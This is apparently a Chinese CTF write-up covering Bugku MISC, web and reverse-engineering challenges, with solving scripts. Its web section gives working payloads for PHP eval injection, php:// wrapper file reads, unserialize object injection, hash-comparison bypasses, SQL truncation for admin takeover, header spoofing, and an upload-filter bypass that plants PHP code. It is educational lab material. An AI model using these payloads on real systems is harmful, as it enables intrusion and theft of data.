Bugku-wp

bugku的部分wp

MISC

闪的好快

1568616335935

下载文件是一个动态二维码,扫描第一帧之后会返回一个S,所以猜测就是所有二维码的字符串就是flag,所以写个脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
#-*- coding: UTF-8 -*-  

import os
import requests
import sys
from io import BytesIO
from pyzbar import pyzbar
from PIL import Image,ImageEnhance

def analyseImage(path):
'''
Pre-process pass over the image to determine the mode (full or additive).
Necessary as assessing single frames isn't reliable. Need to know the mode
before processing all frames.
'''
im = Image.open(path)
results = {
'size': im.size,
'mode': 'full',
}
try:
while True:
if im.tile:
tile = im.tile[0]
update_region = tile[1]
update_region_dimensions = update_region[2:]
if update_region_dimensions != im.size:
results['mode'] = 'partial'
break
im.seek(im.tell() + 1)
except EOFError:
pass
return results


def processImage(path):
'''
Iterate the GIF, extracting each frame.
'''
mode = analyseImage(path)['mode']

im = Image.open(path)

i = 0
p = im.getpalette()
last_frame = im.convert('RGBA')

try:
while True:
print "saving %s (%s) frame %d, %s %s" % (path, mode, i, im.size, im.tile)

'''
If the GIF uses local colour tables, each frame will have its own palette.
If not, we need to apply the global palette to the new frame.
'''
if not im.getpalette():
im.putpalette(p)

new_frame = Image.new('RGBA', im.size)

'''
Is this file a "partial"-mode GIF where frames update a region of a different size to the entire image?
If so, we need to construct the new frame by pasting it on top of the preceding frames.
'''
if mode == 'partial':
new_frame.paste(last_frame)

new_frame.paste(im, (0,0), im.convert('RGBA'))
new_frame.save('%s-%d.png' % (''.join(os.path.basename(path).split('.')[:-1]), i), 'PNG')

i += 1
last_frame = new_frame
im.seek(im.tell() + 1)
except EOFError:
pass

def get_ewm():
""" 读取二维码的内容: img_adds:二维码地址(可以是网址也可是本地地址 """
for i in range(0,18):
img_adds = "masterGO-"+str(i)+".png"
#print(img_adds)
if os.path.isfile(img_adds):
# 从本地加载二维码图片
img = Image.open(img_adds)
else:
# 从网络下载并加载二维码图片
rq_img = requests.get(img_adds).content
img = Image.open(BytesIO(rq_img))

# img.show() # 显示图片,测试
txt_list = pyzbar.decode(img)

for txt in txt_list:
barcodeData = txt.data.decode("utf-8")
sys.stdout.write(barcodeData)

def main():
#先将gif分解为单帧
#processImage('masterGO.gif')
get_ewm()
print("\n")


if __name__ == "__main__":
main()

得到flag:SYC{F1aSh_so_f4sT}

啊哒

1568827458685

用binwalk查看文件

1568828004482

发现有个压缩包,binwalk分离文件,直接分离文件

1568828961957

得到myzip,进行解压,发现需要密码,这个时候查看一些图片的具体信息,发现

1568829019838

将这部分16进制转成字符串,得到sdnisc_2018

输入,得到flag.txt,

1568829211025

得到flag{3XiF_iNf0rM@ti0n}

come_game

打开文件,发现:

1569325053446

打开游戏运行,界面如下

1569325918803

发现新生成了三个文件:

1569325939931

用winhex打开看看,最后发现是save1文件中,存储着关卡信息,更改2对应16进制,将32改为33

1569325998150

发现关卡发生改变,接着改到35时,出现flag:

1569326120568

所以flag为FLAG{6E23F259D98DF153}

白哥的鸽子

下载下来一个jpg二进制文件,猜测可能是图片,改一下文件名,

1

放到linux下,binwalk查看一下隐藏文件,发现没有什么特殊的地方,用winhex打开,

1569488195253

在末尾发现一段可用字符串,可能被加密了,用各种基本解密方法尝试解密,发现是栅栏密码,

1569488342884

发现flag{w22_is_v3ry_cool}

linux

下载下来一个压缩包文件,然后在linux中进行解压,得到一个flag的二进制文件,使用cat进行捕捉,发现flag:

1569487517188

隐写3

下载一个压缩包,打开发现里面有张图片

放到linux中尝试看1569487731556看是否有隐藏文件,发现不能打开,所以猜测是CRC校验的问题,修改高度对应位置:

1569487950545

1569488713708

得到flag{He1l0_d4_ba1}

做个游戏(08067CTF)

打开文件,一个java程序,运行:

1570107328501

题目描述说,60秒,后面的速度越来越快,不太行~

尝试使用逆向工具,

1570111100476

代码文件里面翻阅,发现

1570111442136

得到flag{RGFqaURhbGlfSmlud2FuQ2hpamk=}

交上去发现不对,看其中被base64加密了,解密后flag{DajiDali_JinwanChiji}

Web

Web2

打开链接:

1563499089600

查看源码,查找flag

KEY{Web-2-bugKssNNikls9100}

计算器

打开链接,发现只能输入一位

1563499243714

按f12打开控制台,查看相关源代码,发现maxlen=1,将其改为2,

1563499346428

重新输入,结果21即可得到flag{CTF-bugku-0032}

web基础$_GET

打开链接,发现以下代码:

1
2
3
4
$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

很简单就是用GET方法进行传值,注意在index.php界面进行传值,payload如下:

http://123.206.87.240:8002/get/index.php?what=flag

得到flag{bugku_get_su8kej2en}

web基础$_POST

跟上题很像,只是传参方法换了,使用POST方法,使用hackbar,直接传参:

1563499955737

得到flag{bugku_get_ssseint67se}

矛盾

打开链接,得到这个:

1
2
3
4
5
6
7
$num=$_GET['num'];
if(!is_numeric($num)) //num不能是个数字
{
echo $num;
if($num==1) //num需要等于1
echo 'flag{**********}';
}

==是比较运算符号 不会检查条件式的表达式的类型,所以我们可以构造一组整数等于1的字符串payload如下:
http://123.206.87.240:8002/get/index1.php?num=1s

得到flag{bugku-789-ps-ssdf}

web3

打开链接:

1563500308549

查看源码。发现一组编码:

KEY{J2sa42ahJK-HS11III}

unicode编码,解码得到KEY{J2sa42ahJK-HS11III}

域名解析

1563500701982

直接添加hosts文件,在尾部加上123.206.87.240 flag.baidu.com

在浏览器中输入:flag.baidu.com得到KEY{DSAHDSJ82HDS2211}

你必须让他停下

打开链接,发现:

1563501010048

看源码,会发现图片一直在变,在这个页面一直刷新就行,就能得到flag

1563502005100

本地包含

1
2
3
4
5
6
<?php 
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>

方法一:eval存在命令执行漏洞,使用hello构造payload

http://123.206.87.240:8003/index.php?hello=1);show_source(%27flag.php%27);var_dump(3

1
2
3
4
5
6
7
8
9
10
int(1) <?php 
$flag = 'Too Young Too Simple';
# echo $flag;
# flag{bug-ctf-gg-99};
?> int(3) <?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>

方法二:

http://123.206.87.240:8003/index.php?hello=1);include $_POST['f'];

在POST区域:f=php://filter/convert.base64-encode/resource=flag.php

img

方法三:直接将flag.php文件读入变量hello中

?hello=get_file_contents('flag.php')

1563502905376

备份是个好习惯

利用md5或者php中“==”的漏洞进行操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str); //用空串覆盖key所以需要构造两个重复
parse_str($str);
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
echo $flag."取得flag";
}
?>

关键代码就是需要key1与key2的值相等,但是加密之前的值不同

  • md5()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的

    1
    http://123.206.87.240:8002/web16?kkeyey1[]=something&kkeyey2[]=nothing
  • 如果两个字符经MD5加密后的值为 0exxxxx形式,就会被认为是科学计数法,且表示的是0*10的xxxx次方,还是零,都是相等的。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    下列的字符串的MD5值都是0e开头的:

    QNKCDZO

    240610708

    s878926199a

    s155964671a

    s214587387a

    s214587387a
    http://123.206.87.240:8002/web16?kkeyey1=QNKCDZO&kkeyey2=240610708

秋名山老司机

2s秒内需要计算出结果然后post value值上去,可以用脚本进行计算

1563074255375

1
2
3
4
5
6
7
8
9
10
11
12
import requests
import re
url='http://123.206.87.240:8002/qiumingshan/'
r=requests.session()
requestpage = r.get(url)
ans = re.findall('<div>(.*?)=\?;</div>', requestpage.text) #获取表达式
#print("ans",ans)
ans="".join(ans)#列表转为字符串
post=eval(ans)#计算表达式的值
data={'value':post}#构造post的data部分
flag=r.post(url,data=data)
print(flag.text)

得到flag: Bugku{YOU_DID_IT_BY_SECOND}

速度要快

1563074538607

看看源代码,需要我们post一个margin值上去

1563074553394

尝试抓包,发送repeater一下,然后go,发现flag,base64解密

1563074657978

交上去,发现不对,然后将margin赋值,用post方法传上去,发现也不对,再go几次发现,flag值在变化..…..…

想想题目说速度要快,所以可能需要通过脚本进行传值

1
2
3
4
5
6
7
8
9
10
import requests
import base64
url="http://123.206.87.240:8002/web6/"
r=requests.session()
headers=r.get(url).headers #获取header
mid=base64.b64decode(headers['flag'])
mid=mid.decode()#为了下一步用split不报错,b64decode后操作的对象是byte类型的字符串,而split函数要用str类型的
flag = base64.b64decode(mid.split(':')[1])#获得flag:后的值
data={'margin':flag}
print (r.post(url,data).text)#post方法传上去

cookie欺骗

1563084583171

打开看是一堆字符串,而且是一组重复出现,尝试MD5解密,没有结果。之后看看url

http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ=

filename后的好像是base64编码,尝试解码:keys.txt

也就是说我们可以通过filename来得到文件信息,而我们想得到flag可以尝试看一下后台index.php的源码,同样需要将iindex.php编码,用line控制行数可将其打印出。

http://123.206.87.240:8002/web11/index.php?line=1&filename=aW5kZXgucGhw

使用脚本

1
2
3
4
5
import requests
for i in range(30):
url = "http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"
s = requests.get(url)
print(s.text)

得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php

error_reporting(0);

$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");

$line=isset($_GET['line'])?intval($_GET['line']):0;

if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");

$file_list = array(

'0' =>'keys.txt',

'1' =>'index.php',

);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){

$file_list[2]='keys.php';

}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

我们可以尝试添加Cookie,然后将keys.php编码后传上去

1563085751184

得到flag:KEY{key_keys}

nerve give up

1563086276292

还是看看源码:

1563086305533

所以访问下http://123.206.87.240:8006/test/1p.html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--


var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ%3D%3D--%3E"
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
OutWord();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

得到一组base64加密字符串,注意这里%3D%3D-–%3E是url加密,解密的是==-->

所以直接进行base64解密得到:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
";if(!$_GET['id'])
{
header('Location: hello.php?id=1');
exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.')) #寻找.在a中第一次出现的位置
{
echo 'no no no no no no no';
return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
require("f4l2a3g.txt");
}
else
{
print "never never never give up !!!";
}
?>

尝试直接访问f4l2a3g.txt文件,得到flag:flag{tHis_iS_THe_fLaG}

welcome to bugkuctf

打开链接,还是啥都没有,看看源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
<!--  
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
//user不为空且user=welcome to the bugkuctf
echo "hello admin!<br>";
include($file); //hint.php
}else{
echo "you are not admin ! ";
}
-->

这里就要使用php伪协议了。这道题目为了解决第二个条件,要用到 “php://input”协议。大致的意思是让  txt=php://input ,之后在post过去一个字符串

http://123.206.87.240:8006/index.php?txt=php://input

welcome to the bugkuctf //将其post上去

1563087740125

此时根据提示我们可以把包含的文件读出来了,这里要用到php的第二个伪协议:php://filter

txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php(简单来说就是利用伪协议读取所包含文件的base64值)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PD9waHAgIA0KICANCmNsYXNzIEZsYWd7Ly9mbGFnLnBocCAgDQogICAgcHVibGljICRmaWxlOyAgDQogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9zdHJpbmcoKXsgIA0KICAgICAgICBpZihpc3NldCgkdGhpcy0+ZmlsZSkpeyAgDQogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgDQoJCQllY2hvICI8YnI+IjsNCgkJcmV0dXJuICgiZ29vZCIpOw0KICAgICAgICB9ICANCiAgICB9ICANCn0gIA0KPz4gIA== 

解码:
<?php
class Flag{//flag.php
public $file;
public function __tostring(){
if(isset($this->file)){ //如果文件为空,
echo file_get_contents($this->file);
echo "<br>";
return ("good");
}
}
}
?>

看看能不能直接读flag:

1563088574560

显然没有flag,所以不能直接访问。这个信息返回到index.php页面,所以讲hint.php改成index.php看看里面的信息。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php  
$txt = $_GET["txt"];
$file = $_GET["file"];
$password = $_GET["password"];

if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){
echo "hello friend!<br>";
if(preg_match("/flag/",$file)){
echo "不能现在就给你flag哦";
exit();
}else{
include($file);
$password = unserialize($password);
echo $password;
}
}else{
echo "you are not the number of bugku ! ";
}

?>

<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //hint.php
}else{
echo "you are not admin ! ";
}
-->

我们发现当Flag方法当做字符串执行时,会自动执行 __tostring 方法,方法中写了如果file文件存在,那么就输出file文件中的内容。构造一个Flag类型的参数,并把这个参数传给password然后get进去。并且这个file的值要是hint.php(因为要利用hint.php中的函数)

1
2
3
4
5
6
7
8
9
10
<?php  
class Flag{
public $file;
}

$a = new Flag();
$a->file = "flag.php";
$a = serialize($a);
print_r($a);
?>

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

所以构造的url为:http://123.206.87.240:8006/index.php?txt=php://input&file=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

得到flag:flag{php_is_the_best_language}

字符?正则?

1563096419448

利用正则匹配构造id的值,用GET方法传上去

1
2
3
4
5
6
7
8
9
10
11
12
13
/代表匹配的开始与结束两个/里面的内容就是要匹配的内容

.代表数字匹配任意数字,*代表匹配0-n次两者结合.*就是匹配任一个数字任意次

\表示要找\后面的内容,\/.\/就是找/数字/

{4,7}表示匹配前一个字符47

[a-z]就是匹配a-z之间的字符

[[:punct:]]代表任意标点

i代表字体大小

前女友(SKCTF)

1563152873367

打开链接出现这个,查看源码,

1563152912959

点击一下,可以得到code.txt中的内容

1
2
3
4
5
6
7
8
9
10
11
12
<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
$v1 = $_GET['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
if($v1 != $v2 && md5($v1) == md5($v2)){
if(!strcmp($v3, $flag)){ //相等返回0,不相等返回非0值
echo $flag;
}
}
}
?>

跟前面一道题很像,绕过md5,这里需要说一下就是strcmp在比较数组的时候返回应该是0,所以url构造如下:http://123.206.31.85:49162/index.php?v1=QNKCDZO&v2=240610708&v3[]=something

得到flag:SKCTF{Php_1s_tH3_B3St_L4NgUag3}

login1(SKCTF)

1563170285152

随便注册一下,发现,无法登陆,发现可以注册账号,之后登陆发现需要获取管理员权限

  1. 在SQL中执行字符串处理时,字符串末尾的空格符将会被删除。换句话说“vampire”等同于“vampire ”,对于绝大多数情况来说都是成立的(诸如WHERE子句中的字符串或INSERT语句中的字符串)例如以下语句的查询结果,与使用用户名“vampire”进行查询时的结果是一样的

    SELECT * FROM users WHERE username='vampire ';

  2. 在所有的INSERT查询中,SQL都会根据varchar(n)来限制字符串的最大长度。也就是说,如果字符串的长度大于“n”个字符的话,那么仅使用字符串的前“n”个字符。比如特定列的长度约束为“5”个字符,那么在插入字符串“vampire”时,实际上只能插入字符串的前5个字符,即“vampi”。

注意密码是大小字母还要加数字,还有admin后的空格需要足够多的。

我的注册是:

1
2
admin                                                123
QW123q

之后登陆就能得到flag:SKCTF{4Dm1n_HaV3_GreAt_p0w3R}

你从哪里来

1563172400331

伪造一下来源,改一下referer

referer: https://www.google.com

得到flag{bug-ku_ai_admin}

目前遇到几个有关请求头的题,这里就稍微做一下总结

通用首部字段

20180520002110491

请求首部字段

20180520002238786

响应首部字段

20180520002319248

md5 collision(NUPT_CTF)

1563347322036

根据题目所说,md5冲突,无非就是两个不同的值,但md5相等,所以先试试0e开头的

http://123.206.87.240:9009/md5.php?a=s878926199a

得到flag:flag{md5_collision_is_easy}

程序员本地网站

1563347878023

从本地访问,可以很清楚地看出,需要我们改一下X-Forwarded-For的值为:127.0.0.1

可以用burpsuite抓包,得到flag:flag{loc-al-h-o-st1}

各种绕过

1563348024498

打开链接会发现:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
 <?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']); //url解码
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
if ($_GET['uname'] == $_POST['passwd'])

print 'passwd can not be uname.';

else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))

die('Flag: '.$flag);
else
print 'sorry!';
}
?>

首先id=urlencode(margin)=margin,uname不能和passwd相等,但是sha1之后要相等,sha1只对字符型进行处理,是数组的话返回false,注意是在index.php中传值。

所以payload:http://123.206.87.240:8002/web7/index.php?id=margin&uname[]=something

还需要post:passwd[]=nothing

可以用hackbar完成操作,得到Flag: flag{HACK_45hhs_213sDD}

web8

1563348852297

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
//trim() 函数移除字符串两侧的空白字符或其他预定义字符
//file_get_contents() 函数把整个文件读入一个字符串中
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>

题目中提出有txt文件,尝试1.txt,index.txt,flag.txt,最后发现flag.txt中有文件,

1563348934053

所以payload:http://123.206.87.240:8002/web8/index.php?ac=flags&fn=flag.txt

得到flag:flag{3cfb7a90fc0de31}

细心

1563349135195

打开链接发现这样的页面:

1563349160681

我还以为这道题又被大佬们给干掉了,看了别人的博客发现可以做,那就接着走..…..…

查看源码,什么也没有。怎么办??用御剑扫一下后台吧

1563349378055

发现可以访问,robots.txt,打开看看

1563349400409

接着做

1563349521709

题目是想办法变成admin,所以试试下面这个payload=http://123.206.87.240:8002/web13/resusl.php?x=admin

得到flag:flag(ctf_0098_lkji-s)

求getshell

1563349709402

打开链接,1563349760286

大佬说的,如果是walf严格匹配,通过修改Content-type后字母的大小写可以绕过检测,使得需要上传的文件可以到达服务器端,而服务器的容错率较高,一般我们上传的文件可以解析。然后就需要确定我们如何上传文件,这里将文件的后缀名改为.jpg和.png都不可行,在分别将后缀名修改为php2, php3, php4, php5, phps, pht, phtm, phtml(php的别名),发现只有php5没有被过滤,成功上传,得到flag

先传一张图片,进行抓包,然后修改下面两个地方:

  • filename 改为 1.php5
  • 消息头中的Content-type将其后随便一个字母改为大写

1563351052361

Re

入门逆向

下载下来,查看一下文件类型:

1568826318865

32位应用程序,所以用ida打开:

1568826397313

发现一组ASCII码的数据,直接进行解码就行

flag{Re_1s_S0_C0oL}

Easy_vb

下载解题文件,查看一下文件类型:

1568826639239

用ida打开看看:

1568827107099

发现flag,看题目要求,flag最终为:flag{_N3t_Rev_1s_E4ay_}

Easy_re

下载解题文件后,先查看文件类型

1568913833317

运行试试:

1568913899702

现在用ida打开看看,容易找到相应位置

1568914507502

逆序,DUTCTF{We1c0met0DUTCTF}Easy_re

下载解题文件后,先查看文件类型

1568913833317

运行试试:

1568913899702

现在用ida打开看看,容易找到相应位置

1568914507502

逆序,DUTCTF{We1c0met0DUTCTF}

游戏过关

方法一

这是一道exe逆向问题,而网上大多教程都是用OD解题,此时我对OD的使用情况并不是特别的熟练,尝试用ida进行解题。

用ida打开,

1569121302586

尝试找到main函数,可以i搜索,在function中用CTRL+F进行搜索:

1569121358446

查看main函数:

1569121577728

读完函数逻辑,查看其中的if-else判断,经逐个测试,发现最终会进入到:1569121723181

顺着思路,发现sub_45E940函数,打开查看逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
sub_45A7BE("done!!! the flag is ");
v59 = 18;
v60 = 64;
v61 = 98;
v62 = 5;
v63 = 2;
v64 = 4;
v65 = 6;
v66 = 3;
v67 = 6;
v68 = 48;
v69 = 49;
v70 = 65;
v71 = 32;
v72 = 12;
v73 = 48;
v74 = 65;
v75 = 31;
v76 = 78;
v77 = 62;
v78 = 32;
v79 = 49;
v80 = 32;
v81 = 1;
v82 = 57;
v83 = 96;
v84 = 3;
v85 = 21;
v86 = 9;
v87 = 4;
v88 = 62;
v89 = 3;
v90 = 5;
v91 = 4;
v92 = 1;
v93 = 2;
v94 = 3;
v95 = 44;
v96 = 65;
v97 = 78;
v98 = 32;
v99 = 16;
v100 = 97;
v101 = 54;
v102 = 16;
v103 = 44;
v104 = 52;
v105 = 32;
v106 = 64;
v107 = 89;
v108 = 45;
v109 = 32;
v110 = 65;
v111 = 15;
v112 = 34;
v113 = 18;
v114 = 16;
v115 = 0;
v2 = 123;
v3 = 32;
v4 = 18;
v5 = 98;
v6 = 119;
v7 = 108;
v8 = 65;
v9 = 41;
v10 = 124;
v11 = 80;
v12 = 125;
v13 = 38;
v14 = 124;
v15 = 111;
v16 = 74;
v17 = 49;
v18 = 83;
v19 = 108;
v20 = 94;
v21 = 108;
v22 = 84;
v23 = 6;
v24 = 96;
v25 = 83;
v26 = 44;
v27 = 121;
v28 = 104;
v29 = 110;
v30 = 32;
v31 = 95;
v32 = 117;
v33 = 101;
v34 = 99;
v35 = 123;
v36 = 127;
v37 = 119;
v38 = 96;
v39 = 48;
v40 = 107;
v41 = 71;
v42 = 92;
v43 = 29;
v44 = 81;
v45 = 107;
v46 = 90;
v47 = 85;
v48 = 64;
v49 = 12;
v50 = 43;
v51 = 76;
v52 = 86;
v53 = 13;
v54 = 114;
v55 = 1;
v56 = 117;
v57 = 126;
v58 = 0;
for ( i = 0; i < 56; ++i )
{
*(&v2 + i) ^= *(&v59 + i);
*(&v2 + i) ^= 0x13u;
}
return sub_45A7BE("%s\n");

写个python脚本:

1
2
3
4
5
6
7
8
9
10
#encoing=utf-8

array1 = [0x12,0x40,0x62,0x5,0x2,0x4,0x6,0x3,0x6,0x30,0x31,0x41,0x20,0x0C,0x30,0x41,0x1F,0x4E,0x3E,0x20,0x31,0x20,0x1,0x39,0x60,0x3,0x15,0x9,0x4,0x3E,0x3,0x5,0x4,0x1,0x2,0x3,0x2C,0x41,0x4E,0x20,0x10,0x61,0x36,0x10,0x2C,0x34,0x20,0x40,0x59,0x2D,0x20,0x41,0x0F,0x22,0x12,0x10,0x0]

array2 = [0x7B,0x20,0x12,0x62,0x77,0x6C,0x41,0x29,0x7C,0x50,0x7D,0x26,0x7C,0x6F,0x4A,0x31,0x53,0x6C,0x5E,0x6C,0x54,0x6,0x60,0x53,0x2C,0x79,0x68,0x6E,0x20,0x5F,0x75,0x65,0x63,0x7B,0x7F,0x77,0x60,0x30,0x6B,0x47,0x5C,0x1D,0x51,0x6B,0x5A,0x55,0x40,0x0C,0x2B,0x4C,0x56,0x0D,0x72,0x1,0x75,0x7E,0x0]

flag = ""
for i in range(0,0x38):
flag += chr(array1[i]^array2[i]^0x13)
print(flag)

得到zsctf{T9is_tOpic_1s_v5ry_int7resting_b6t_others_are_n0t}

方法二

查看文件,

1568914737217

运行看看,

1568914795086

用OD打开,查找关键字符串,找到相应位置:

1571315854653

所以我们需要跳转到这来即可,现在我们重新查找关键字符串,找到输入的地方,下一个断点:
1571315967180

开始动态调试:
1571316018557

找到一个可以跳转的函数,将此处改为我们刚刚查找的地址:

jle long 0141E968

取消断点,运行一下:
1571316136155

得到flag:zsctf{T9is_tOpic_1s_v5ry_int7resting_b6t_others_are_n0t}

Timer

一个apk文件,安装之后出现一个读秒的,用apktool进行反编译,查看 MainActivity函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
package net.bluelotus.tomorrow.easyandroid;

import android.os.Bundle;
import android.os.Handler;
import android.support.v7.app.AppCompatActivity;
import android.view.Menu;
import android.view.MenuItem;
import android.widget.TextView;

public class MainActivity extends AppCompatActivity {
int beg = (((int) (System.currentTimeMillis() / 1000)) + 200000);
int k = 0;
int now;
long t = 0;

public native String stringFromJNI2(int i);

public static boolean is2(int n) {
if (n <= 3) {
if (n > 1) {
return true;
}
return false;
} else if (n % 2 == 0 || n % 3 == 0) {
return false;
} else {
int i = 5;
while (i * i <= n) {
if (n % i == 0 || n % (i + 2) == 0) {
return false;
}
i += 6;
}
return true;
}
}
protected void onCreate(Bundle savedInstanceState) {
//调用父类Activity的onCreate()方法,超类继承防止递归调用
super.onCreate(savedInstanceState);
//setContentView(R.layout.activity_main)这行代码,来将指定的资源xml文件加载到对应的activity
setContentView((int) R.layout.activity_main);
//文本框
final TextView tv1 = (TextView) findViewById(R.id.textView2);
final TextView tv2 = (TextView) findViewById(R.id.textView3);
//创建一个消息处理
final Handler handler = new Handler();
handler.postDelayed(new Runnable() {
public void run() {
MainActivity.this.t = System.currentTimeMillis();
MainActivity.this.now = (int) (MainActivity.this.t / 1000);
MainActivity.this.t = 1500 - (MainActivity.this.t % 1000);
tv2.setText("AliCTF");
if (MainActivity.this.beg - MainActivity.this.now <= 0) {
tv1.setText("The flag is:");
tv2.setText("alictf{" + MainActivity.this.stringFromJNI2(MainActivity.this.k) + "}");
}
MainActivity mainActivity;
if (MainActivity.is2(MainActivity.this.beg - MainActivity.this.now)) {
mainActivity = MainActivity.this;
mainActivity.k += 100;
} else {
mainActivity = MainActivity.this;
mainActivity.k--;
}
tv1.setText("Time Remaining(s):" + (MainActivity.this.beg - MainActivity.this.now));
handler.postDelayed(this, MainActivity.this.t);
}
}, 0);
}

public boolean onCreateOptionsMenu(Menu menu) {
getMenuInflater().inflate(R.menu.menu_main, menu);
return true;
}

public boolean onOptionsItemSelected(MenuItem item) {
if (item.getItemId() == R.id.action_settings) {
return true;
}
